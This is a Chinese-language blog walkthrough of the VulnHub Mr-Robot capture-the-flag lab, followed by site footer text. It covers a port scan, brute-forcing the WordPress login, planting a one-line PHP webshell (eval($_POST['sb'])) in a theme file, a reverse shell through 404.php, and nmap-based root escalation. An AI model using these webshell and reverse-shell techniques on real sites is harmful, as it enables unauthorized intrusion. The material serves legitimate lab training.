Mr-robot靶机练习详解

下载靶机使用虚拟机打开,打靶目标获取三个key文件
靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/
1.首先对局域网进行主机扫描,命令nmap 192.168.1.1/24,发现目标主机192.168.127.140打开端口有22、80、443
在这里插入图片描述
2.浏览网站查看情况,看到一个命令行的界面自动使用root用户登录但是用户可以使用的命令被限制了都是一些没什么用的命令,其他的命令全部不能使用
在这里插入图片描述

3.使用burp对目标网站进行目录爬虫发现在网站下面有一个robots.txt文件,打开发现一个key1文件,访问key1文件得到key1
在这里插入图片描述
在这里插入图片描述

访问fsocity.dic得到一个字典,访问User-agent:*出现一个页面可以登录点击login进入一个登录页面

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

胡乱输入一个用户名和密码登录之后报错用户名不存在,可以对其进行爆破,使用burp对其进行爆破
在这里插入图片描述

先对用户名进行爆破,点击load选择我们刚刚下载的字典文件,爆破得到用户名Elliot

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

使用同样的方法对密码进行爆破,这里下载的字典的正确密码在最末尾去了,爆破的话需要很长的时间,所以将正确密码进行了提前。爆破的得到密码ER28-0652
在这里插入图片描述

4.使用用户名密码登录之后显示一页面,看见很多的php文件而且可以修改可以利用这个进行木马上传之后利用中国蚁剑进行连接,在all
在这里插入图片描述

在其中一个编辑插入一句话木马eval($_POST[‘sb’])然后点击更新文件
在这里插入图片描述

之后利用中国蚁剑进行连接,这里连接时候的密码就是我们写入的一句话木马的sb,连接之后在home目录下面发现了一个key2和一个密码文件,key没有可读权限我们先打开密码文件,打开发现一个用户和MD5加密的密码,对其进行解密得到密码abcdefghijklmnopqrstuvwxyz,这里需要登录到系统所以我们使用shell反弹

在这里插入图片描述
在这里插入图片描述

5.在kali中将/usr/share/websehlls/php/php-revers-shell.php中的内容复制到网站的404.php中将IP地址改为我们主机的IP地址,进行shell反弹,并在kali中将1234端口打开进行监听,之后访问一个不存在的网页(因为在web中404表示文件或目录不存在当我们访问不存在的文件目录时就会执行404.php也就会执行我们反弹shell),可以看到访问之后收到了反弹回来的shell

在这里插入图片描述
在这里插入图片描述

之后优化shell
在这里插入图片描述

我们利用中国蚁剑获取的用户密码登录
在这里插入图片描述

登录之后查看之前的key2获得key2
在这里插入图片描述

6.得到key2之后我们在系统中查看key3是否存在,没有发现key3但是很多目录不能扫描需要root权限,所以需要提权
在这里插入图片描述

这里查看拥有root权限的命令文件,发现nmap了,因为在早期的nmap中内置root终端可以利用其进行提权,查看nmap版本
在这里插入图片描述

进行提权之后看到#表示提权成功
在这里插入图片描述

发现key3文件,进行查看获取key3,完成了最终的目的
在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值